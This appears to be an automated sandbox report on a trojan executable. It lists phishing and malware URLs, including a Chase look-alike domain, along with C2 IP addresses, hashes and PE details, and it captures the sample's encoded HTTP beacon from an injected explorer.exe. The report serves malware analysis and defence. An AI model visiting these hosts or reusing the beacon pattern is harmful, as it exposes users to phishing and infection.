                http://www.secure-id6793-chase.com/zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjptrue
                • Avira URL Cloud: phishing
                unknown
                http://www.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqEtrue
                • Avira URL Cloud: malware
                unknown
                www.secure-id6793-chase.com/zzun/true
                • Avira URL Cloud: phishing
                low
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.00098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.fontbureau.com0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.com/designersG0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fonts.comc0098764345678.exe, 00000000.00000003.263438887.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263144005.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262991538.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263340582.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263111987.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263505726.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263403072.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263652450.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263454212.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263175663.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263090313.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263265218.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263287108.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263576385.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263025198.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263526587.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263471443.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263596357.0000000005665000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cn/bThe0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers?0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.tiro.com0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.goodfont.co.kr0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.comX0098764345678.exe, 00000000.00000003.262961210.0000000005665000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.coml0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.comLQ0098764345678.exe, 00000000.00000003.263070688.000000000564B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sajatypeworks.com0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.tiro.comcom0098764345678.exe, 00000000.00000003.263275143.000000000564B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.typography.netD0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/cabarga.htmlN0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/cThe0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htm0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.288166992.0000000005630000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.268355050.0000000005649000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.268444960.0000000005649000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://fontfabrik.com0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/frere-jones.html0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fonts.comB0098764345678.exe, 00000000.00000003.263438887.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263144005.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263340582.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263111987.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263505726.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263403072.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263652450.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263454212.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263175663.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263090313.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263265218.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263287108.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263576385.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263025198.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263526587.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263471443.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263596357.0000000005665000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/DPlease0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers80098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.comgritakD0098764345678.exe, 00000000.00000003.288166992.0000000005630000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.308556522.0000000005641000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fonts.com0098764345678.exe, 00000000.00000003.263438887.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263144005.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262991538.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263340582.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263111987.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263505726.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263403072.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262961210.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263652450.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263454212.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263175663.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263090313.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263265218.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263287108.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263576385.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263025198.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262968838.000000000564B000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263526587.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263471443.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263596357.0000000005665000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.sandoll.co.kr0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPlease0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.zhongyicts.com.cn0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sakkal.com0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.comFXD0098764345678.exe, 00000000.00000003.288166992.0000000005630000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.308556522.0000000005641000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ww25.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuOmsiexec.exe, 00000012.00000002.544412109.0000000004DB2000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    194.195.211.26
                                    www.secure-id6793-chase.comGermany
                                    6659NEXINTO-DEtrue
                                    103.224.212.221
                                    www.whipbull.comAustralia
                                    133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                    IP
                                    192.168.2.1
                                    Joe Sandbox Version:35.0.0 Citrine
                                    Analysis ID:680503
                                    Start date and time: 08/08/202217:51:212022-08-08 17:51:21 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:0098764345678.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:28
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/1@4/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 91.4% (good quality ratio 80.1%)
                                    • Quality average: 72%
                                    • Quality standard deviation: 33%
                                    HCA Information:
                                    • Successful, ratio: 95%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • VT rate limit hit for: 0098764345678.exe
                                    TimeTypeDescription
                                    17:52:36API Interceptor1x Sleep call for process: 0098764345678.exe modified
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\0098764345678.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                    MD5:69206D3AF7D6EFD08F4B4726998856D3
                                    SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                    SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                    SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.65977826584326
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:0098764345678.exe
                                    File size:834560
                                    MD5:69ec82c711ed34399013471e214a7e64
                                    SHA1:f7fd0fc9eb038b2debf63b0ebec21f48c3fffdd4
                                    SHA256:f71f9af9db20ea569e9a4b528898183f182a9d98a6f8668275c55690b5a59c49
                                    SHA512:c754f373d1ffc031c50ade5a01361db53dded163e050b53fdb050fc450f2342efd40234fbf9bda15fbbc6509f66cd3bbd8fa13e32e436051cd84adce4f31e173
                                    SSDEEP:12288:8Vo1u002iN2FjeBEdy2mlSvnlcAPeSoe9nfHAQRpzzLjIh1jNy1isxQKdHl:T218FCyE1SvlcAPeSo3oqRy/xQiF
                                    TLSH:1A05D0E015F57A18F027233232C0E4F86BE6EDCBC909D139DDA6D74AA725EC1D5A2523
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P..............M... ...`....@.. ....................... ............@................................
                                    Icon Hash:1c8ab6c6c508b999
                                    Entrypoint:0x4c4d86
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x62F10016 [Mon Aug 8 12:22:46 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc4d340x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x894c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xc2d8c0xc2e00False0.8549162624278384data7.755433575033054IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0xc60000x894c0x8a00False0.1674309329710145data2.423555644029796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xd00000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0xc61300x82f8data
                                    RT_GROUP_ICON0xce4280x14data
                                    RT_VERSION0xce43c0x324data
                                    RT_MANIFEST0xce7600x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 8, 2022 17:54:29.462809086 CEST4979080192.168.2.3103.224.212.221
                                    Aug 8, 2022 17:54:29.631725073 CEST8049790103.224.212.221192.168.2.3
                                    Aug 8, 2022 17:54:29.631834030 CEST4979080192.168.2.3103.224.212.221
                                    Aug 8, 2022 17:54:29.631973982 CEST4979080192.168.2.3103.224.212.221
                                    Aug 8, 2022 17:54:29.817436934 CEST8049790103.224.212.221192.168.2.3
                                    Aug 8, 2022 17:54:29.817598104 CEST4979080192.168.2.3103.224.212.221
                                    Aug 8, 2022 17:54:29.817646027 CEST4979080192.168.2.3103.224.212.221
                                    Aug 8, 2022 17:54:29.986388922 CEST8049790103.224.212.221192.168.2.3
                                    Aug 8, 2022 17:54:34.966815948 CEST4980680192.168.2.3194.195.211.26
                                    Aug 8, 2022 17:54:35.406991005 CEST8049806194.195.211.26192.168.2.3
                                    Aug 8, 2022 17:54:35.407249928 CEST4980680192.168.2.3194.195.211.26
                                    Aug 8, 2022 17:54:35.407283068 CEST4980680192.168.2.3194.195.211.26
                                    Aug 8, 2022 17:54:35.918919086 CEST4980680192.168.2.3194.195.211.26
                                    Aug 8, 2022 17:54:36.387742043 CEST4980680192.168.2.3194.195.211.26
                                    Aug 8, 2022 17:54:36.409172058 CEST8049806194.195.211.26192.168.2.3
                                    Aug 8, 2022 17:54:36.414807081 CEST8049806194.195.211.26192.168.2.3
                                    Aug 8, 2022 17:54:36.414913893 CEST4980680192.168.2.3194.195.211.26
                                    Aug 8, 2022 17:54:37.418978930 CEST8049806194.195.211.26192.168.2.3
                                    Aug 8, 2022 17:54:37.419154882 CEST4980680192.168.2.3194.195.211.26
                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 8, 2022 17:54:29.278208971 CEST5281053192.168.2.38.8.8.8
                                    Aug 8, 2022 17:54:29.456583977 CEST53528108.8.8.8192.168.2.3
                                    Aug 8, 2022 17:54:34.828834057 CEST5979553192.168.2.38.8.8.8
                                    Aug 8, 2022 17:54:34.965318918 CEST53597958.8.8.8192.168.2.3
                                    Aug 8, 2022 17:54:40.935967922 CEST5209653192.168.2.38.8.8.8
                                    Aug 8, 2022 17:54:40.964920998 CEST53520968.8.8.8192.168.2.3
                                    Aug 8, 2022 17:54:45.967725039 CEST6064053192.168.2.38.8.8.8
                                    Aug 8, 2022 17:54:46.486936092 CEST53606408.8.8.8192.168.2.3
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Aug 8, 2022 17:54:29.278208971 CEST192.168.2.38.8.8.80x6659Standard query (0)www.whipbull.comA (IP address)IN (0x0001)
                                    Aug 8, 2022 17:54:34.828834057 CEST192.168.2.38.8.8.80x6fc4Standard query (0)www.secure-id6793-chase.comA (IP address)IN (0x0001)
                                    Aug 8, 2022 17:54:40.935967922 CEST192.168.2.38.8.8.80x9adcStandard query (0)www.7ball123a.websiteA (IP address)IN (0x0001)
                                    Aug 8, 2022 17:54:45.967725039 CEST192.168.2.38.8.8.80x1126Standard query (0)www.zytfjgyl.comA (IP address)IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Aug 8, 2022 17:54:29.456583977 CEST8.8.8.8192.168.2.30x6659No error (0)www.whipbull.com103.224.212.221A (IP address)IN (0x0001)
                                    Aug 8, 2022 17:54:34.965318918 CEST8.8.8.8192.168.2.30x6fc4No error (0)www.secure-id6793-chase.com194.195.211.26A (IP address)IN (0x0001)
                                    Aug 8, 2022 17:54:40.964920998 CEST8.8.8.8192.168.2.30x9adcServer failure (2)www.7ball123a.websitenonenoneA (IP address)IN (0x0001)
                                    Aug 8, 2022 17:54:46.486936092 CEST8.8.8.8192.168.2.30x1126Name error (3)www.zytfjgyl.comnonenoneA (IP address)IN (0x0001)
                                    • www.whipbull.com
                                    • www.secure-id6793-chase.com
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.349790103.224.212.22180C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Aug 8, 2022 17:54:29.631973982 CEST9455OUTGET /zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqE HTTP/1.1
                                    Host: www.whipbull.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Aug 8, 2022 17:54:29.817436934 CEST9457INHTTP/1.1 302 Found
                                    Date: Mon, 08 Aug 2022 15:54:29 GMT
                                    Server: Apache/2.4.38 (Debian)
                                    Set-Cookie: __tad=1659974069.1428159; expires=Thu, 05-Aug-2032 15:54:29 GMT; Max-Age=315360000
                                    Location: http://ww25.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqE&subid1=20220809-0154-2954-9c47-df7aa132154a
                                    Content-Length: 0
                                    Connection: close
                                    Content-Type: text/html; charset=UTF-8


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.349806194.195.211.2680C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
